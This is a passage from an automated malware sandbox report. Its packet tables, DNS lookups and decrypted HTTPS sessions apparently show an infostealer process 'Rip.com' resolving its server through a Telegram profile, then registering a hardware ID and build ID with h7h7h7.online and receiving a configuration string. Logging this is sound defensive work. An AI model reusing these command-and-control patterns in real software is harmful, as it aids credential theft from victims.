                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586256027 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586292982 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586308002 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586338997 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586350918 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586384058 CET44349777116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586390972 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586407900 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586431980 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586461067 CET44349777116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586464882 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586494923 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586510897 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586541891 CET44349777116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586543083 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586577892 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586600065 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586617947 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586643934 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586678982 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586688042 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586700916 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586730957 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586745977 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586783886 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586797953 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586801052 CET44349777116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586818933 CET44349777116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586819887 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.586898088 CET44349777116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:37.588310957 CET44349777116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:38.062182903 CET49778443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:38.062258005 CET44349778116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:38.062333107 CET49778443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:38.062731981 CET49778443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:38.062766075 CET44349778116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:38.713128090 CET44349778116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:38.714642048 CET49778443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:38.715370893 CET49778443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:38.715392113 CET44349778116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:38.717097998 CET49778443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:38.717113018 CET44349778116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:39.449697018 CET44349778116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:39.449743986 CET44349778116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:39.449795961 CET49778443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:39.449831963 CET44349778116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:39.449860096 CET49778443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:39.449882030 CET49778443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:39.449913025 CET44349778116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:39.450145960 CET49778443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:39.450165987 CET44349778116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:39.450203896 CET49778443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:39.452680111 CET49779443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:39.452723980 CET44349779116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:39.452795029 CET49779443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:39.453020096 CET49779443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:39.453032970 CET44349779116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.109812021 CET44349779116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.110328913 CET49779443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.110857010 CET49779443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.110866070 CET44349779116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.112824917 CET49779443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.112829924 CET44349779116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.794924021 CET44349779116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.794948101 CET44349779116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.795000076 CET49779443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.795020103 CET44349779116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.795030117 CET49779443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.795033932 CET44349779116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.795066118 CET49779443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.795092106 CET49779443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.795322895 CET49779443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.795337915 CET44349779116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.812331915 CET49781443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.812370062 CET44349781116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.812458992 CET49781443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.812689066 CET49781443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:40.812707901 CET44349781116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:41.729413986 CET44349781116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:41.729505062 CET49781443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:41.729831934 CET49781443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:41.729840040 CET44349781116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:41.731458902 CET49781443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:41.731463909 CET44349781116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:42.384962082 CET44349781116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:42.385040045 CET44349781116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:42.385107994 CET49781443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:42.385835886 CET49781443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:42.385847092 CET44349781116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.243674040 CET44349777116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.243774891 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.243786097 CET44349777116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.243830919 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.244673014 CET49777443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.244693995 CET44349777116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.847028017 CET49788443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.847057104 CET44349788116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.847110033 CET49788443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.848256111 CET49788443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:44.848268032 CET44349788116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:45.493694067 CET44349788116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:45.493743896 CET49788443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:45.496753931 CET49788443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:45.496762037 CET44349788116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:45.498707056 CET49788443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:45.498714924 CET44349788116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.196888924 CET44349788116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.196949959 CET44349788116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.196966887 CET49788443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.196999073 CET49788443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.197168112 CET49788443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.197180986 CET44349788116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.198534966 CET49799443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.198618889 CET44349799116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.198705912 CET49799443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.198909044 CET49799443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.198945045 CET44349799116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.861011982 CET44349799116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.864722967 CET49799443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.864945889 CET49799443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.864969015 CET44349799116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.866754055 CET49799443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:46.866766930 CET44349799116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:47.557051897 CET44349799116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:47.557105064 CET44349799116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:47.557142019 CET49799443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:47.557198048 CET49799443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:47.557332993 CET49799443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:47.557380915 CET44349799116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:55.219970942 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:55.225147009 CET8049724199.232.214.172192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:55.225210905 CET4972480192.168.2.4199.232.214.172

                                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Dec 31, 2024 21:39:50.698323965 CET6368253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 31, 2024 21:39:50.788264036 CET53636821.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:05.101241112 CET4965053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:05.108108997 CET53496501.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.424777031 CET5881453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.437154055 CET53588141.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.789340973 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:17.864439964 CET53602301.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:17.882707119 CET53653031.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:17.983171940 CET6266653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:17.983310938 CET4929853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:17.989783049 CET53626661.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:17.989882946 CET53492981.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:18.779197931 CET53553651.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:20.513895035 CET53558491.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:21.841187954 CET5982853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:21.841319084 CET6021453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:21.846764088 CET53491541.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:21.847990036 CET53598281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:21.848292112 CET53602141.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:22.848300934 CET6224953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:22.848611116 CET5194953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:22.855129004 CET53622491.1.1.1192.168.2.4
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:22.855396986 CET53519491.1.1.1192.168.2.4

                                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Dec 31, 2024 21:39:50.698323965 CET192.168.2.41.1.1.10x6ce1Standard query (0)uVsReHLpkvXMkPFzJmRm.uVsReHLpkvXMkPFzJmRmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:05.101241112 CET192.168.2.41.1.1.10x14faStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.424777031 CET192.168.2.41.1.1.10x1a24Standard query (0)h7h7h7.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:17.983171940 CET192.168.2.41.1.1.10x8c33Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:17.983310938 CET192.168.2.41.1.1.10x3454Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:21.841187954 CET192.168.2.41.1.1.10xda44Standard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:21.841319084 CET192.168.2.41.1.1.10x57c0Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:22.848300934 CET192.168.2.41.1.1.10x46e4Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:22.848611116 CET192.168.2.41.1.1.10x67daStandard query (0)play.google.com65IN (0x0001)false

                                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Dec 31, 2024 21:39:50.788264036 CET1.1.1.1192.168.2.40x6ce1Name error (3)uVsReHLpkvXMkPFzJmRm.uVsReHLpkvXMkPFzJmRmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:05.108108997 CET1.1.1.1192.168.2.40x14faNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:06.437154055 CET1.1.1.1192.168.2.40x1a24No error (0)h7h7h7.online116.203.13.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:17.989783049 CET1.1.1.1192.168.2.40x8c33No error (0)www.google.com172.217.16.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:17.989882946 CET1.1.1.1192.168.2.40x3454No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:21.847990036 CET1.1.1.1192.168.2.40xda44No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:21.847990036 CET1.1.1.1192.168.2.40xda44No error (0)plus.l.google.com216.58.212.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:21.848292112 CET1.1.1.1192.168.2.40x57c0No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 31, 2024 21:40:22.855129004 CET1.1.1.1192.168.2.40x46e4No error (0)play.google.com142.250.186.174A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                                              • t.me
                                                                                                                                                                                                                                                              • h7h7h7.online
                                                                                                                                                                                                                                                              • www.google.com
                                                                                                                                                                                                                                                              • apis.google.com

                                                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              0192.168.2.449737149.154.167.994437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:06 UTC85OUTGET /w211et HTTP/1.1
                                                                                                                                                                                                                                                              Host: t.me
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:06 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:06 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              Content-Length: 12308
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: stel_ssid=7773a24815fd7d40e1_8723601272896908433; expires=Wed, 01 Jan 2025 20:40:06 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              Cache-control: no-store
                                                                                                                                                                                                                                                              X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                              2024-12-31 20:40:06 UTC12308INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 77 32 31 31 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @w211et</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              1192.168.2.449738116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:07 UTC186OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:07 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              2192.168.2.449739116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:08 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----s2n79hdjwbsjmyu37gvk
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 256
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:08 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 73 32 6e 37 39 68 64 6a 77 62 73 6a 6d 79 75 33 37 67 76 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 31 42 46 44 44 35 31 31 44 36 33 33 30 35 32 39 38 33 36 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 73 32 6e 37 39 68 64 6a 77 62 73 6a 6d 79 75 33 37 67 76 6b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 73 32 6e 37 39 68 64 6a 77 62 73 6a 6d 79 75 33 37 67 76 6b 2d 2d 0d
                                                                                                                                                                                                                                                              Data Ascii: ------s2n79hdjwbsjmyu37gvkContent-Disposition: form-data; name="hwid"CF1BFDD511D63305298366-a33c7340-61ca------s2n79hdjwbsjmyu37gvkContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------s2n79hdjwbsjmyu37gvk--
                                                                                                                                                                                                                                                              2024-12-31 20:40:09 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:09 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:09 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 3a1|1|1|1|2501d44103c55efc5f73d4da6882b199|1|0|1|1|0|50000|10


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              3192.168.2.449740116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:09 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----as2djeknyuk6f3e3ekx4
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
